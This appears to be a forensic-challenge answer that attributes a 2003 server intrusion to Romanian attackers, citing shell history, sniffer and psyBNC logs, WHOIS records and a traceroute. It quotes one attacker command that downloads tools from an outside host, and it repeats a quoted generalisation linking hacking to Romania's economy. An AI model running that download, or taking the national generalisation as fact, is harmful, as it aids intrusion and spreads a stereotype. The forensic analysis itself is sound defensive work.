Bonus Question:
What nationality do you believe the attacker(s) to be, and why?

 

The hack happened from Romania. But we cannot be 100% sure that the hacker is indeed from that country.
The machine in Romania can be again just another hacked machine....

the hacker downloads the following file (wee see in .bash_history):

wget izolam.net/sslstop.tar.gz

how could he know that the file was there?
When I tried to connect to www.izolam.net, there was a Flash Splash Page, and that's it...

izolam.net resolves to 63.99.224.38.

 

Moreover also in the sniffer log ('mfs' file in /lib/.x/s), we see connections to the FTP server on the same address, 63.99.224.38:

 

============================================================
Time: Sun Aug 10 15:40:47 Size: 100
Path: 192.168.1.79 => 63.99.224.38 [21]
------------------------------------------------------------

 

So let's see:

 

WHOIS (networksolutions.com) for:

izolam.net

Registrant:
Buskey, Daniel (LIKTBZWGKD)
6127 Green Bay Rd
Suite 400
Kenosha, WI 53142
US

Domain Name: IZOLAM.NET

Administrative Contact:
Buskey, Daniel (COKGNLAFEI) sales@readyhosting.com
6127 Green Bay Rd
Suite 400
Kenosha, WI 53142
US
262-652-7640
Technical Contact:
Ready Hosting Inc. (TWHBUQCCZO) sysadmin@readyhosting.com
6127 Green Bay Road
Suite 400
Kenosha, WI 53142
US
262-652-7640 fax: 262-652-7650

Record expires on 10-May-2004.
Record created on 10-May-2003.
Database last updated on 8-Sep-2003 06:38:20 EDT.

Domain servers in listed order:

NS5.READYHOSTING.COM 63.99.209.103
NS6.READYHOSTING.COM 63.99.209.104

 

So izolam.net is registered in the US. How did the guy know the file was there ? Any hacker buddy there ? Google ? We just don't and can't know.

 

 

 

The addresses in Romania instead are:

213.154.118.219
extreme-service-10.is.pcnet.ro - which resolves to 213.154.118.218
213.154.118.218 is also written somewhere else, not resolved to an FQDN.

These addresses belong to:

inetnum: 213.154.96.0 - 213.154.127.255
netname: PCNET
descr: PCNET Data Network S.A.
descr: PROVIDER ADSL Network
country: RO
admin-c: BT17-RIPE
tech-c: PDNN1-RIPE
status: ASSIGNED PA
notify: tudor@pcnet.ro
mnt-by: AS8503-MNT
changed: tudor@pcnet.ro 20030704
source: RIPE

route: 213.154.116.0/22
descr: PCNET
origin: AS8503
notify: tudor@pcnet.ro
mnt-by: AS8503-MNT
changed: tudor@pcnet.ro 20020912
source: RIPE

role: PCNET Data Network NOC
address: Splaiul Unirii, nr. 10
address: Bucharest, ROMANIA
phone: +40 1 330 86 61
phone: +40 1 330 35 23
fax-no: +40 1 675 49 99
e-mail: tudor@pcnet.ro
trouble: +40 9 325 18 84
admin-c: BT17-RIPE
tech-c: BT17-RIPE
tech-c: AP158-RIPE
tech-c: CM3059-RIPE
tech-c: CN19-RIPE
tech-c: IG20-RIPE
tech-c: CR60-RIPE
nic-hdl: PDNN1-RIPE
remarks: ----------
remarks: abuse: abuse@pcnet.ro
remarks: ----------
remarks: for escaladation please directly call the
remarks: technical manager
notify: tudor@pcnet.ro
mnt-by: AS8503-MNT
changed: tudor@pcnet.ro 20011008
source: RIPE

person: Bogdan Tudor
remarks: Technical Manager
remarks: PCNET Data Network S.A.
address: Bucharest, Romania
phone: +40 9 325 18 84
phone: +40 1 330 86 61
phone: +40 1 330 35 23
fax-no: +40 1 675 49 99
nic-hdl: BT17-RIPE
mnt-by: BT17-RIPE-MNT
notify: tudor@pcnet.ro

 

Thus our two contiguos addresses in the same network... they might just be two addresses in a DHCP pool for dial-up connections of this provider, or they might be on the same leased line, with two cracker 'working' together. I suppose that they were two people: very likely, since we see that TWO users were created to use the psyBNC. In particular we see that the first user - USER 'sic' - creates the account fo his 'buddy' - USER 'redcode'. On the log of psyBNC the connect from different addresses:

[...]
Sun Aug 10 16:07:34 :connect from sanido-09.is.pcnet.ro
Sun Aug 10 16:07:47 :User sic logged in.
[...]
Sun Aug 10 17:49:41 :connect from sanido-08.is.pcnet.ro
Sun Aug 10 17:49:47 :User sic logged in.
Sun Aug 10 17:50:39 :New User:redcode (4,1redCode8Chicken) added by sic
Sun Aug 10 17:50:51 :User redcode () has no server added
Sun Aug 10 17:51:22 :connect from sanido-08.is.pcnet.ro
Sun Aug 10 17:51:22 :User redcode logged in.
[...]

 

The source of the connection is a BroadBand provider in Romania (just visit their webpage www.pcnet.ro - it says it).

 

domain-name: pcnet.ro
description: PC-NET Data Network
admin-contact: MB51-ROTLD
technical-contact: AN160-ROTLD
zone-contact: AB494-ROTLD
nameserver: ns1.pcnet.ro 213.154.128.1
nameserver: ns2.pcnet.ro 213.154.128.2
nameserver: ns3.pcnet.ro 213.154.128.3
info: object maintained by ro.rnc local registry
info: Register your .ro domain names at www.rotld.ro
notify: domain-admin@listserv.rnc.ro
object-maintained-by: ROTLD-MNT
mnt-lower: ROTLD-MNT
updated: domain-admin@listserv.rnc.ro 19970519
updated: ciprian@rnc.ro 19990601
updated: ciprian@rnc.ro 19991207
updated: cristih@rnc.ro 20000829
source: ROTLD

person: Mihai Batraneanu
address: PC-NET Data Network S.A.
address: Splaiul Unirii 10, bl B5, sc2, et 1
address: Bucharest, Romania
phone: +40-21-330 28 01
fax-no: +40-21-330 28 42
e-mail: mihai@pcnet.ro
nic-hdl: MB51-ROTLD
info: object maintained by ro.rnc local registry
notify: domain-admin@listserv.rnc.ro
object-maintained-by: ROTLD-MNT
updated: danacorb@sunu.rnc.ro 19970901
updated: ciprian@rnc.ro 19991207
source: ROTLD

person: Alina-Mihaela Nemes
address: PCNET DATA NETWORK SA
address: Bd. Mircea Eliade, nr. 18
address: Bucharest, Romania
phone: +40-21-2080460
fax-no: +40-21-2080461
e-mail: alina@pcnet.ro
nic-hdl: AN160-ROTLD
info: object maintained by ro.rnc local registry
notify: domain-admin@listserv.rnc.ro
object-maintained-by: ROTLD-MNT
updated: danacorb@sunu.rnc.ro 19970901
updated: ciprian@rnc.ro 19991207
updated: imanea@rnc.ro 19991207
source: ROTLD

person: Adrian Batraneanu
address: PC-NET Data Network S.A.
address: Splaiul Unirii 10, bl B5, sc2, et 1
address: Bucharest, Romania
phone: +40-21-330 28 01
fax-no: +40-21-330 28 42
e-mail: adi@pcnet.ro
nic-hdl: AB494-ROTLD
info: object maintained by ro.rnc local registry
notify: domain-admin@listserv.rnc.ro
object-maintained-by: ROTLD-MNT
updated: danacorb@sunu.rnc.ro 19970901
updated: ciprian@rnc.ro 19991207
source: ROTLD

 

And - just to be extremely paranoid - we confirm the geographical position ot the IP address with a traceroute:

 

Samspade's
traceroute extreme-service-10.is.pcnet.ro

extreme-service-10.is.pcnet.ro resolves to 213.154.118.218

Do not contact either Los Nettos (ln.net) or Centergate Research Group (centergate.com) based on the results of this traceroute.

3 130.152.180.21 10.489 ms isi-1-lngw2-atm.ln.net [AS226] Los Nettos origin AS
4 198.172.117.161 9.599 ms ge-9-3.a01.lsanca02.us.ra.verio.net [AS2914] Verio
5 129.250.46.121 9.908 ms ge-1-2-0.a00.lsanca02.us.ra.verio.net [AS2914] Verio
6 129.250.29.120 20.016 ms xe-1-0-0-4.r20.lsanca01.us.bb.verio.net [AS2914] Verio
7 144.232.9.201 17.436 ms sl-bb21-ana-9-1-1620xT1.sprintlink.net [AS1239] SprintLink Backbone
8 144.232.1.186 126.806 ms sl-bb23-ana-13-0.sprintlink.net [AS1239] SprintLink Backbone
9 144.232.18.61 81.474 ms sl-bb23-fw-9-1.sprintlink.net [AS1239] SprintLink Backbone
10 144.232.11.245 81.468 ms sl-bb21-fw-13-0.sprintlink.net [AS1239] SprintLink Backbone
11 144.232.9.30 75.929 ms sl-bb22-pen-13-0.sprintlink.net [AS1239] SprintLink Backbone
12 144.232.8.177 81.671 ms sl-bb23-pen-15-0.sprintlink.net [AS1239] SprintLink Backbone
13 144.232.20.117 81.080 ms sl-bb21-tuk-0-0.sprintlink.net [AS1239] SprintLink Backbone
14 144.232.19.70 226.869 ms sl-bb21-lon-14-0.sprintlink.net [AS1239] SprintLink Backbone
15 213.206.128.37 165.416 ms sl-bb20-lon-15-0.sprintlink.net
16 213.206.129.70 152.214 ms sl-bb21-par-14-0.sprintlink.net
17 217.118.224.33 159.985 ms sl-bb20-par-15-0.sprintlink.net
18 213.206.129.66 165.348 ms sl-bb21-fra-13-0.sprintlink.net
19 217.147.96.42 162.866 ms sl-gw10-fra-15-0.sprintlink.net
20 217.147.111.114 159.959 ms sle-gtshu-13-0.sprintlink.net
21 195.39.208.82 179.992 ms ro-defra-1.gtsce.net (DNS error)
22 193.226.179.10 183.797 ms r01-PO1-1-0.clj2.RO.kq-gts.net (DNS error) [AS5606] Bucharest ROMANIA
23 193.226.179.254 188.221 ms r01-PO4-0-0.brv2.RO.kq-gts.net (DNS error) [AS5606] Bucharest ROMANIA
24 193.226.179.30 193.798 ms r01-PO9-0-0.buh1.RO.kq-gts.net (DNS error) [AS5606] Bucharest ROMANIA
25 193.226.139.54 189.541 ms PC-NET3rd.RO.kpnQwest.net (DNS error) [AS5606] Bucharest ROMANIA
26 213.154.128.93 191.918 ms unassigned-reverse.pcnet.ro (DNS error) [AS8503] RO
27 213.154.129.82 202.897 ms atm-is-0-0.pcnet.ro (DNS error) [AS8503] RO
28 213.154.127.57 287.113 ms atm-core-0-0-60.is.pcnet.ro (DNS error) [AS8503] RO
29 213.154.116.141 225.351 ms extreme-service.is.pcnet.ro [AS8503] RO

 

It is likely for the attacker to be Romanian. Mainly for the use of multiple IP addresses, it's LESS likely (but not impossible) to be using hacked romanian machines.

Moreover, I have a suspicion (see also Answer N.9) that a string found in one of the recovered files 'gustavo__.log.1u2' is somehow related to a name of a person. I don't know Romanian language, but it at least SOUNDS similar to my own language (italian - both derivating from ancient latin), and Gustavo IS a name in use in my country, so I suspect it also is used in Romenia.

This also confirms what Lance Spitzner told me at 'Blackhat Europe 2003': "[...] For example, the more economically depressed a coutry is the more hacking you see coming from it, like Romania. The vast majority of hacking comes from Romania, because they are so economically depressed.[...]" (interview published - translated in Italian since it was for italian readers can be found at http://www.itvirtualcommunity.net/blackhat03/spitzner.asp. I do have the original writeup stored on my personal site (in english): http://www.muscetta.org/spitzner_interview.txt.

 

 

Home